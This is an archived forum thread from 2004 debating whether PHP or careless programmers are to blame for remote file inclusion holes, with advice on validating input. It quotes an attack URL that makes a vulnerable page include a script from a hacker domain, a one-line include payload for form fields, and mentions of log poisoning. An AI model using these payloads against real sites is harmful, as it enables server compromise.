PHP blamed for security problems

**Kevin Thorpe** · Jul 17 '05, 04:14 AM

Re: PHP blamed for security problems

> Many clients seem to be using PHP that looks like this:[color=blue]
>
> <html>
> ...standard header...
> <? include($page); ?>
> ...standard footer...
> </html>[/color]

Sadly that's so true. It's a shame taint checking isn't available in php
to warn about that sort of thing.

It isn't php's fault as such. I've come across similar dynamic include
problems at regular intervals for years (dBase used to allow it and
could be royally screwed). It's just ten times worse when you can access
off-site files and execute in local context.

**Phil Roberts** · Jul 17 '05, 04:14 AM

Re: PHP blamed for security problems

With total disregard for any kind of safety measures Kevin Thorpe
<kevin@pricetra k.com> leapt forth and uttered:
[color=blue]
> It isn't php's fault as such. I've come across similar dynamic
> include problems at regular intervals for years (dBase used to
> allow it and could be royally screwed). It's just ten times
> worse when you can access off-site files and execute in local
> context.
>
>[/color]

But if you include remote files via HTTP, then you are making a
HTTP request. You can't include source code from another server
because the HTTP response will not pass the code, only the output
from the code.

Ultimatly the security risk arises from shit programmers. Not the
language itself.

--
Phil Roberts | Dork Pretending To Be Hard | http://www.flatnet.net/

**CountScubula** · Jul 17 '05, 04:14 AM

Re: PHP blamed for security problems

"Phil Roberts" <philrob@HOLYfl atnetSHIT.net> wrote in message
news:Xns94AEB56 3A730Cphilrober ts@216.196.97.1 32...[color=blue]
> With total disregard for any kind of safety measures Kevin Thorpe
> <kevin@pricetra k.com> leapt forth and uttered:
>[color=green]
> > It isn't php's fault as such. I've come across similar dynamic
> > include problems at regular intervals for years (dBase used to
> > allow it and could be royally screwed). It's just ten times
> > worse when you can access off-site files and execute in local
> > context.
> >
> >[/color]
>
> But if you include remote files via HTTP, then you are making a
> HTTP request. You can't include source code from another server
> because the HTTP response will not pass the code, only the output
> from the code.
>
> Ultimatly the security risk arises from shit programmers. Not the
> language itself.
>
>
>
> --
> Phil Roberts | Dork Pretending To Be Hard | http://www.flatnet.net/[/color]

True it will not include the source, but only the output, you can write a
php script to output valid code.

an example would be:

<?php
print "<?php\n";
print "// do some evil here\n";
print "?>\n";
?>

and if you included this from another site it would apear to be valid code.

I agree that it is not a PHP concern, but a lack of forethought (hey, I am
guilty too, but I get to it) the same security risks are in perl as well.
they are just easier in php.

One of the biggest things I see, is people taking data from an input from,
and writing it to a file, the doing an incude() on it. just put <?php
include(http://www.bla.com/script.php); ?> into a form input box and your
good to go

Perhaps when we give examples we should also encourage the use of a bit of
security. and it helps when we point it out to each other as well, in fact
numerous people here Pedro, Chung, Tim, and many others, have pointed stuff
out to me. it helps all of us stay on our toes, and allows us to give better
examples that are not so sloppy.

--
Mike Bradley
http://www.gzentools.com -- free online php tools

**William Ahern** · Jul 17 '05, 04:14 AM

Re: PHP blamed for security problems

Phil Roberts <philrob@holyfl atnetshit.net> wrote:
<snip>[color=blue]
> But if you include remote files via HTTP, then you are making a
> HTTP request. You can't include source code from another server
> because the HTTP response will not pass the code, only the output
> from the code.[/color]

For the sake of others stumbling upon this post, it is completely wrong. I
think if Phil re-read this he'd realize why. (And if not, re-read the
original post and the URL of the sample malicous script.)

- Bill

**Tim Van Wassenhove** · Jul 17 '05, 04:14 AM

Re: PHP blamed for security problems

On 2004-03-16, Tim Tyler <tim@tt1lock.or g> wrote:[color=blue]
> Here's what this morning's security advisory read here:
> ``Recently, we've seen an increase in malicious activity on
> our servers, caused by hackers who have successfuly gained
> shell access via insecure PHP scripts.[/color]

And who's to blame for that? The php script? Or the sysadmin that gives
to many rights to the user that is running apache?
[color=blue]
> What you may not be aware of is that functions such as
> include() also allow URLs to be passed as their argument.
> Since these functions cause the included file to be parsed
> and executed as PHP code, this can be a major security flaw.[/color]

First line in the manual (So people can't say they didn't know)
The include() statement includes and evaluates the specified file.
[color=blue]
> This example would cause
> http://www.hacker-domain.co.uk/my-root-script.txt
> to be downloaded and executed as PHP, allowing the hacker to
> manipulate server files and create backdoors which allow
> them to log in using telnet or ssh and cause further
> disruption.''[/color]

Again, if a local user has the rights to do all this stuff....
Then the admins should be fired for allowing this.

--

http://home.mysth.be/~timvw

**Allodoxaphobia** · Jul 17 '05, 04:14 AM

Re: PHP blamed for security problems

On 17 Mar 2004 01:15:16 GMT, Tim Van Wassenhove hath writ:[color=blue]
> On 2004-03-16, Tim Tyler <tim@tt1lock.or g> wrote:[color=green]
>> Here's what this morning's security advisory read here:
>> ``Recently, we've seen an increase in malicious activity on
>> our servers, caused by hackers who have successfuly gained
>> shell access via insecure PHP scripts.[/color]
>
> And who's to blame for that? The php script? Or the sysadmin that gives
> to many rights to the user that is running apache?
>[color=green]
>> What you may not be aware of is that functions such as
>> include() also allow URLs to be passed as their argument.
>> Since these functions cause the included file to be parsed
>> and executed as PHP code, this can be a major security flaw.[/color]
>
> First line in the manual (So people can't say they didn't know)
> The include() statement includes and evaluates the specified file.
>[color=green]
>> This example would cause
>> http://www.hacker-domain.co.uk/my-root-script.txt
>> to be downloaded and executed as PHP, allowing the hacker to
>> manipulate server files and create backdoors which allow
>> them to log in using telnet or ssh and cause further
>> disruption.''[/color]
>
> Again, if a local user has the rights to do all this stuff....
> Then the admins should be fired for allowing this.[/color]

At a previous ISP -- who also was hosted my web site -- I noticed
one day that files I created/updated in PHP were assigned the
ownerid of ---- *me* -- my logonid for the hosting machine!
Crap!! I was also trying to use some secure (userid:passwor d)
http access to some things inside my account -- using file
ownerships to control access to some data.
I pointed this out to the 'web master', and asked "Why!?".
I never got a reply, but several days later I noticed the PHP
program(s) were no longer creating files with owner: my-userid.
Instead, they were ownerid: *root* !!! Geez-Zuss!!!
I moved my account(s) the next day.

Jonesy
--
| Marvin L Jones | jonz | W3DHJ | OS/2
| Gunnison, Colorado | @ | Jonesy | linux __
| 7,703' -- 2,345m | config.com | DM68mn SK

**CountScubula** · Jul 17 '05, 04:14 AM

Re: PHP blamed for security problems

"Allodoxaphobia " <bit-bucket@config.c om> wrote in message
news:slrnc5fbqp .td0.bit-bucket@localhos t.config.com...[color=blue]
> I never got a reply, but several days later I noticed the PHP
> program(s) were no longer creating files with owner: my-userid.
> Instead, they were ownerid: *root* !!! Geez-Zuss!!!
> I moved my account(s) the next day.
>
> Jonesy
> --
> | Marvin L Jones | jonz | W3DHJ | OS/2
> | Gunnison, Colorado | @ | Jonesy | linux __
> | 7,703' -- 2,345m | config.com | DM68mn SK[/color]

Wait, dont go away, what hosting company? :)

(just kidding)

--
Mike Bradley
http://www.gzentools.com -- free online php tools

**MyOdd** · Jul 17 '05, 04:15 AM

Re: PHP blamed for security problems

[color=blue][color=green]
> > Here's what this morning's security advisory read here:
> > ``Recently, we've seen an increase in malicious activity on
> > our servers, caused by hackers who have successfuly gained
> > shell access via insecure PHP scripts.[/color]
>
> And who's to blame for that? The php script? Or the sysadmin that gives
> to many rights to the user that is running apache?
>[/color]

I tend to agree with you here. The fact that the user makes
mistakes/(oversights?) is not a reflection on how php works.
Every application, from Windows to Linux can have their basic securities
bypassed by user actions, (i can drop my firewalls, leave the user name as
'Administrator' and so forth).
I would go as far as saying that php *itself* is very secure.

Maybe php could prevent the usage of include(...) from a $_GET/$_POST but
how can that really be enforced...

I have been wanting to write an app for some times that go thru php scripts
and flags possible security risks. I don't know if i really have the time
to.

Simon.

**R. Rajesh Jeba Anbiah** · Jul 17 '05, 04:15 AM

Re: PHP blamed for security problems

Tim Tyler <tim@tt1lock.or g> wrote in message news:<HuoDpz.Jt 5@bath.ac.uk>.. .
<snip>[color=blue]
>
> However, unless the $page variable is checked for valid
> content -- and input sanity checking is conspicuously absent
> in many PHP scripts we encounter -- this is very open to
> misuse. Malicious third parties could do the following:
>
> http://www.your-domain.co.uk/index.p...oot-script.txt
>
> This example would cause
> http://www.hacker-domain.co.uk/my-root-script.txt
> to be downloaded and executed as PHP, allowing the hacker to
> manipulate server files and create backdoors which allow
> them to log in using telnet or ssh and cause further
> disruption.''[/color]

Blame the design and programmers---not the PHP.

In India, we can file a case against anyone who damage one's name
with a kind of hoax. I don't know, whether we should take some efforts
to sue such people who intentionally damage PHP instead of blaming the
design and programmers.

--
http://www.sendmetoindia.com - Send Me to India!
Email: rrjanbiah-at-Y!com

**Alvaro G Vicario** · Jul 17 '05, 04:15 AM

Re: PHP blamed for security problems

*** Phil Roberts wrote/escribió (Tue, 16 Mar 2004 11:49:48 -0600):[color=blue]
> But if you include remote files via HTTP, then you are making a
> HTTP request. You can't include source code from another server
> because the HTTP response will not pass the code, only the output
> from the code.[/color]

Crackers normally host malicious code in free accounts that don't even have
PHP support. Even if remote host has the PHP interpreter, they just need to
provide a *.txt file with the code.

--
-- Álvaro G. Vicario - Burgos, Spain
--

**Chung Leong** · Jul 17 '05, 04:16 AM

Re: PHP blamed for security problems

Uzytkownik "CountScubu la" <me@scantek.hot mail.com> napisal w wiadomosci
news:3yH5c.1084 0$bB3.7407@news svr27.news.prod igy.com...[color=blue]
> "Phil Roberts" <philrob@HOLYfl atnetSHIT.net> wrote in message
> news:Xns94AEB56 3A730Cphilrober ts@216.196.97.1 32...
> True it will not include the source, but only the output, you can write a
> php script to output valid code.
>
> an example would be:
>
> <?php
> print "<?php\n";
> print "// do some evil here\n";
> print "?>\n";
> ?>[/color]

Or put the file on a server that doesn't parser PHP... In any case, passing
a user variable to require/include introduces a vulnerability even without
access to remote files. An attacker can backtrack to an anonymous FTP
incoming directory, or send the mailious code in an URL to Apache, then link
in the Apache log file.

The problem is, I think, is that many of those who program in PHP came from
a HTML design instead of a programming background. People used to
programming in C/C++ probably wouldn't use include files in that manner.
Another problem is that PHP is often used in environments where there's no
QA process. The best of us make mistakes and any site that hasn't gone
though thorough testing is bound to be insecure.

**thumb_42@yahoo.com** · Jul 17 '05, 04:16 AM

Re: PHP blamed for security problems

Tim Van Wassenhove <euki@pi.be> wrote:[color=blue]
> And who's to blame for that? The php script? Or the sysadmin that gives
> to many rights to the user that is running apache?[/color]

I'd say the person who wrote the script, not the administrator. It
seems common sense to me that you wouldn't include a file comming in
from hostile input w/out very careful consideration, if you must
do it, make sure the file exists where you think it ought to, fits
within the boundaries of a carefully constructed regex etc.. (or
use a table-lookup approach that only allows files/urls that are
predetermined.)

The best bet is simply not to include anything from hostile input in the
first place. Every modern guide, book or tutorial I know of will tell you
not to be careless with user input, so I wouldn't blame PHP for it.

If the script is used to actually gain root access, then I'd either
blame the admin, the application that was exploited (setID executable
probably) or the OS itself, depending on how the system was compromised.
UNIX machines are supposed to be secure, with multiple users having
shell access. Damages should be limited to whatever userID was running
the script.

I feel kind of sorry for the user because he/she may have contracted out
the job, I would hope they'd get their money back at any rate!

Actually, better to not blame anyone, but learn from it. (and if you
were the programmer, do something to try & make up for the damages.)

Jamie

**CountScubula** · Jul 17 '05, 04:16 AM

Re: PHP blamed for security problems

<thumb_42@yahoo .com> wrote in message
news:mq66c.3268 2$1p.495668@att bi_s54...[color=blue]
> Tim Van Wassenhove <euki@pi.be> wrote:[color=green]
> > And who's to blame for that? The php script? Or the sysadmin that gives
> > to many rights to the user that is running apache?[/color]
>
> I'd say the person who wrote the script, not the administrator. It
> seems common sense to me that you wouldn't include a file comming in
> from hostile input w/out very careful consideration, if you must
> do it, make sure the file exists where you think it ought to, fits
> within the boundaries of a carefully constructed regex etc.. (or
> use a table-lookup approach that only allows files/urls that are
> predetermined.)
>
> The best bet is simply not to include anything from hostile input in the
> first place. Every modern guide, book or tutorial I know of will tell you
> not to be careless with user input, so I wouldn't blame PHP for it.
>
> If the script is used to actually gain root access, then I'd either
> blame the admin, the application that was exploited (setID executable
> probably) or the OS itself, depending on how the system was compromised.
> UNIX machines are supposed to be secure, with multiple users having
> shell access. Damages should be limited to whatever userID was running
> the script.
>
> I feel kind of sorry for the user because he/she may have contracted out
> the job, I would hope they'd get their money back at any rate!
>
> Actually, better to not blame anyone, but learn from it. (and if you
> were the programmer, do something to try & make up for the damages.)
>
> Jamie[/color]

Hostile input enviroment, I like that, really no joking I do.
(I may just borrow that one here and there)

hmm, reminds me of my networking days, Hostile, DMZ.... etc..

--
Mike Bradley
http://www.gzentools.com -- free online php tools

**Chung Leong** · Jul 17 '05, 04:16 AM

Re: PHP blamed for security problems

Uzytkownik "Allodoxaphobia " <bit-bucket@config.c om> napisal w wiadomosci
news:slrnc5fbqp .td0.bit-bucket@localhos t.config.com...[color=blue]
> At a previous ISP -- who also was hosted my web site -- I noticed
> one day that files I created/updated in PHP were assigned the
> ownerid of ---- *me* -- my logonid for the hosting machine!
> Crap!! I was also trying to use some secure (userid:passwor d)
> http access to some things inside my account -- using file
> ownerships to control access to some data.
> I pointed this out to the 'web master', and asked "Why!?".
> I never got a reply, but several days later I noticed the PHP
> program(s) were no longer creating files with owner: my-userid.
> Instead, they were ownerid: *root* !!! Geez-Zuss!!!
> I moved my account(s) the next day.[/color]

That reminds me. I still have Apache running as LocalSystem on our Win32
server. Gotta add that to my todo list...

PHP blamed for security problems

PHP blamed for security problems

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment